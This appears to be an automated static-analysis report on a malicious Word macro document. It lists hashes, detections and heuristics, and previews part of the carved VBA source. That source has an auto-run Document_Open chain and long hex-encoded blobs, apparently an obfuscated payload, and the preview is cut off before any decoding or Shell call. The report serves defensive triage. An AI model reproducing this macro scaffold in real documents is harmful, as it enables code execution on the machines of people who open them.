Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 859c94956c13f410…

MALICIOUS

Office (OLE)

54.5 KB Created: 2018-03-01 09:30:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: f771a1f50cc9abd4c4054da2861baaa2 SHA-1: dede9c1a54380c540869cab904c9fe7de7bb3521 SHA-256: 859c94956c13f4105e635ec4e2c61508c7566c915cd5cc4f9efc72de1a12670f
224 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The file contains VBA macros, including a Workbook_Open macro, which is a common technique for executing malicious code upon opening. Note that the macro code lives in the ThisDocument module of a Word document, so the Document_Open handler is the auto-run entry point here; the Workbook_Open routine (an Excel event) only reaches the same code by explicitly calling Document_Open. The critical heuristic 'OLE_VBA_SHELL' indicates the use of the Shell() function, strongly suggesting the execution of external commands or payloads. The extracted VBA source (carved during analysis as 'macros.bas') further supports this, likely containing obfuscated code intended to download and execute a secondary payload.

Heuristics 7

  • ClamAV: Xls.Malware.Cwsp-6735643-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Cwsp-6735643-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13829 bytes
SHA-256: 02ed1d7075afd868a93b90104734a51a408722dd77edc15d8f44d4bd50dff081
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 48 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst note: module header as exported by olevba. VB_Name "ThisDocument"
' places this code in the Word document's own class module, which is where
' the Document_Open event handler defined further down is looked up.
Option Explicit

' Analyst note: Workbook_Open is an Excel workbook event; in a Word
' ThisDocument module it is not an auto-run entry point. Its body only
' declares fourteen String locals, fills each with a long run of hex-digit
' pairs (none of them referenced again inside this procedure), and then
' calls Document_Open, so the auto-run behaviour rests on Document_Open.
Sub Workbook_Open()
Dim IMZ_F As String
IMZ_F = "4343432243293043434343431B2B4376434360430D4343434350436262292A432E684343431C5543431D744331264A274343304317404343434342434343424343436C43434343432D43415C43430A7543434343434343101A43431D43434343507F4343430E430B6517434383"
Dim A_XA As String
A_XA = "1C4343234343434F43434343434343561866435F4677434363804343370A43435C42434359424352B71A504343354343435F434343176C1D43414380434312436343438043280511834343432D814E431F434343441D2F434382044343430B7B414343432E47433B4343435743"
Dim HG_N As String
HG_N = "83434343434308437D4B4A70104344274F3F43432C603043434343437743435D434341434536112707436E3E322243431743782A4343264343433A432F434343464373431C31794343437B434373574F63431F363F2F1F538262433D43064343514343062135434B434343430D"
Dim W_R As String
W_R = "0555434325435D1B6A246843593F43437D784355313265435835434A8010144343430665434357434343437A0D5A43436D38484343433E0943434343494343B01B4343346543430E4F43434343624A4380435B3E434327432F43432843317C43436B434343434333430E222743"
Dim BWL_GYX As String
BWL_GYX = "0D6C3D4343348243734343117F6239302A4B434248437843435E43432C434343432547434343434325547E43771B43430743434328436D437F434366431A49114340434343482743433155464305284317161D3F43533F43455133436567606943654380433B0F434343434043"
Dim KQM_A As String
KQM_A = "3D434341060636435643434F434C41196836434343454343430B7C43705A43270C43694362642D753B2522344343432F62666F43434F43430B2B2F7F43434E514343434343433A437D4363267B43433D431143433943435A3D4343435243432E4315434C432F4327434368200D"
Dim RHI_XTH As String
RHI_XTH = "3E432A435A434F43434343804343434315524343402B143C43434367434D7D435143106C6F43802C4343430F561232204314431A4339434381434743434332415B2A3343431E4343436F4348430943774343437C73674B1B05454381494340434350432F433483434355482044"
Dim JD_OR As String
JD_OR = "43317B0B43433F27434343431B435E320A474333437F545543436C35414322232F434D18777979430443178243514338285B431264434641432A513F430D43434344434A43434343332D6B4370433810436C144342430F3C512C3D6F43434F43434343434379431D430E434371"
Dim P_BS As String
P_BS = "5C430464431978434312716C43833C3F1F0643434B43324D78434C437F3931434B43174343433343294343433343434343430B43112943434343434335764325436F42523443437143621E43295643437F29433D43722E3A43640D35436A437C6D434943433825634343744305"
Dim AYM_H As String
AYM_H = "437E4343434343432543181B34774380437773434346431243434343434343433E18733743434343357B5C435F43435A0543436B43444309434D11365C5E8236433B4543073F1B43433E434343334E434352434381524343436E6C4478433943432908284347564343437A4343"
Dim G_I As String
G_I = "7043431A3C0D4343725E4A2443434343094343762E2A58434343436A6A4343434344615A2F371B7443435F264343104343751052437443434312432B430B430B814309433043437E430643604343454343087443365808606B434321434343584322437A436043434343438043"
Dim G_KH As String
G_KH = "43637E434343432D43433243004343500A4343432715393D186043431143434343544379044343837F43474C3E43433443434326434343498043433743432C4643436F2D254F13432977434343437F430B60664343434331344377375043431F09824374731263434943431143"
Dim JF_DEY As String
JF_DEY = "5B810B252F432B81510E4343434379804343434315435206436A435E430970162543434377437721432D432843722473434F1443432943435A432D431C43336E434343183410436828356E4343752F3D6D0C25064343430A1E21564343084343617005430F4243694371434343"
Dim ON_E As String
ON_E = "4316436B4343126C2D481B12194343563143CE277443322E1A435A24434330695B44436E58204343474343432C0743431F432A1B2F43437C3D434357160C5A2543575E43437B43434334061643095F43193E43431135437D43433E6A71207C708375374343434343430D43436D43074354437A4351430B4343434351431843436E1D43"

    ' Hands control to the Document_Open handler below; the locals above play no
    ' part in this call.
    Document_Open
End Sub
Public Sub Document_Open()
Dim WF_N As String
WF_N = "734379434343430B43072243434D4337432143642552432143787A43431F4343180A432543764343433B5D4343484350533342514325435C2F33385E244343374346131
... (truncated)